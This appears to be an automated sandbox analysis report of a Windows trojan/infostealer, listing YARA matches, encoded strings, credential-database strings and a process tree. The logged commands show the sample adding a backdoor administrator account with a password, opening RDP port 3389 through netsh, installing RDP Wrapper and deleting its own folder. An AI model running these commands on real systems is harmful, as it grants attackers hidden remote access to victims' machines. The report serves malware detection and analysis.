Source: 0000000A.00000002.2967028725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: userAFHDHCAAKE.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66f5db9e54794_vfkagks[1].exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: userGCAEHDBAAE.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66f5dbaca34ac_lfdnsafnds[1].exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: userBGIJEGCGDG.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66f5d9ab0d4c7_rdp[1].exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: userBGIJEGCGDG.exe.4.dr, -Module-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 66f5d9ab0d4c7_rdp[1].exe.4.dr, -Module-.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: userBGIJEGCGDG.exe.4.dr, UHJvZ3JhbUFB.cs	Base64 encoded string: 'inh5L7SGzRU7sj2gmVmtk/eCneBmUqRt8FtNyXoo+5AQmk3oRrY62g==', 'ZuGslAEpNHgbGP2/CVEjxfF+g/ySUEZ1sNXmGyrGai37Z7ophpxr5kYqIxrutvNDBCvvoQkvsCw='
Source: userBGIJEGCGDG.exe.4.dr, QXNzZW1ibHlMb2FkZXJB.cs	Base64 encoded string: 'V3o82UX/MkW0zBr2uq1ofRWXUIfKv+li+lORUOdvw5oSTBJoZYRwd2qoeCeWckJwJoIDClvvsYSEx5KwDTmk2Q=='
Source: userBGIJEGCGDG.exe.4.dr, UkRQSW5zdGFsbGVyQUFB.cs	Base64 encoded string: 'OEyWuG2XpnMfaLJJ1SjuQxay2W4PlIm7ErLccCa5YXYHOaAbp1WmYvs1TACbujnFRkwG3HeI99pmebsUyUcYxg==', 'OEyWuG2XpnMfaLJJ1SjuQxay2W4PlIm7ErLccCa5YXYHOaAbp1WmYvs1TACbujnFRkwG3HeI99pmebsUyUcYxg==', 'mK/MvQHzOU0sxP54k5Qvx/lEMio9f2YK2UC9BwTiz8KREmr0zQ+O+A=='
Source: 66f5d9ab0d4c7_rdp[1].exe.4.dr, UHJvZ3JhbUFB.cs	Base64 encoded string: 'inh5L7SGzRU7sj2gmVmtk/eCneBmUqRt8FtNyXoo+5AQmk3oRrY62g==', 'ZuGslAEpNHgbGP2/CVEjxfF+g/ySUEZ1sNXmGyrGai37Z7ophpxr5kYqIxrutvNDBCvvoQkvsCw='
Source: 66f5d9ab0d4c7_rdp[1].exe.4.dr, QXNzZW1ibHlMb2FkZXJB.cs	Base64 encoded string: 'V3o82UX/MkW0zBr2uq1ofRWXUIfKv+li+lORUOdvw5oSTBJoZYRwd2qoeCeWckJwJoIDClvvsYSEx5KwDTmk2Q=='
Source: 66f5d9ab0d4c7_rdp[1].exe.4.dr, UkRQSW5zdGFsbGVyQUFB.cs	Base64 encoded string: 'OEyWuG2XpnMfaLJJ1SjuQxay2W4PlIm7ErLccCa5YXYHOaAbp1WmYvs1TACbujnFRkwG3HeI99pmebsUyUcYxg==', 'OEyWuG2XpnMfaLJJ1SjuQxay2W4PlIm7ErLccCa5YXYHOaAbp1WmYvs1TACbujnFRkwG3HeI99pmebsUyUcYxg==', 'mK/MvQHzOU0sxP54k5Qvx/lEMio9f2YK2UC9BwTiz8KREmr0zQ+O+A=='

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@94/73@17/15

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_6C307030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

4_2_6C307030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

4_2_00419600

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

4_2_00413720

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File created: C:\Program Files\RDP Wrapper

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\ProgramData\GIEBGIIJDG.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1248:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4284:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: Yara match	File source: 26.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000000.2254101327.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2307164374.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.4.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000004.00000002.2566003324.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2569131365.000000006C4DF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000004.00000002.2550690310.000000001B734000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2990922258.00000000201E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2981605260.000000001A27D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.4.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000004.00000002.2566003324.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2569131365.000000006C4DF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000004.00000002.2550690310.000000001B734000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2990922258.00000000201E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2981605260.000000001A27D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, RegAsm.exe, 0000000A.00000002.2990922258.00000000201E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2981605260.000000001A27D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000004.00000002.2566003324.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2569131365.000000006C4DF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000004.00000002.2550690310.000000001B734000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2990922258.00000000201E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2981605260.000000001A27D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.4.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, RegAsm.exe, 0000000A.00000002.2990922258.00000000201E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2981605260.000000001A27D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.4.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.4.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 0000000A.00000002.2990922258.00000000201E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2981605260.000000001A27D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.4.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.2566003324.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2569131365.000000006C4DF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000004.00000002.2550690310.000000001B734000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2990922258.00000000201E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2981605260.000000001A27D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000004.00000002.2566003324.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2550690310.000000001B734000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000004.00000002.2566003324.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2569131365.000000006C4DF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000004.00000002.2550690310.000000001B734000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2990922258.00000000201E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2981605260.000000001A27D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 0000000A.00000002.2990922258.00000000201E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2981605260.000000001A27D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: RegAsm.exe, 0000003D.00000002.3283819592.0000000001207000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.0000000001226000.00000004.00000020.00020000.00000000.sdmp, JKEHIIJJECFHJKECFHDG.4.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, RegAsm.exe, 0000000A.00000002.2990922258.00000000201E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2981605260.000000001A27D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.4.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000004.00000002.2566003324.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2550690310.000000001B734000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2990922258.00000000201E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2981605260.000000001A27D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.4.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAFHDHCAAKE.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userAFHDHCAAKE.exe "C:\Users\userAFHDHCAAKE.exe"
Source: C:\Users\userAFHDHCAAKE.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\userAFHDHCAAKE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userAFHDHCAAKE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userGCAEHDBAAE.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userGCAEHDBAAE.exe "C:\Users\userGCAEHDBAAE.exe"
Source: C:\Users\userGCAEHDBAAE.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userBGIJEGCGDG.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\userGCAEHDBAAE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userBGIJEGCGDG.exe "C:\Users\userBGIJEGCGDG.exe"
Source: C:\Users\userBGIJEGCGDG.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\Users\userBGIJEGCGDG.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: C:\Users\userBGIJEGCGDG.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user RDPUser_615fbfde V24hFLzx4jqu /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_615fbfde V24hFLzx4jqu /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_615fbfde V24hFLzx4jqu /add
Source: C:\Users\userBGIJEGCGDG.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Users\userBGIJEGCGDG.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Users\userBGIJEGCGDG.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Administrators" RDPUser_615fbfde /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_615fbfde /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_615fbfde /add
Source: C:\Users\userBGIJEGCGDG.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_615fbfde /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" RDPUser_615fbfde /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_615fbfde /add
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BKFHCGIDBA.exe "C:\ProgramData\BKFHCGIDBA.exe"
Source: C:\ProgramData\BKFHCGIDBA.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\BKFHCGIDBA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BKJJEBKKEH.exe "C:\ProgramData\BKJJEBKKEH.exe"
Source: C:\ProgramData\BKJJEBKKEH.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\BKJJEBKKEH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\GIEBGIIJDG.exe "C:\ProgramData\GIEBGIIJDG.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AEBAFBGIDHCB" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAFHDHCAAKE.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userGCAEHDBAAE.exe"	Jump to behavior
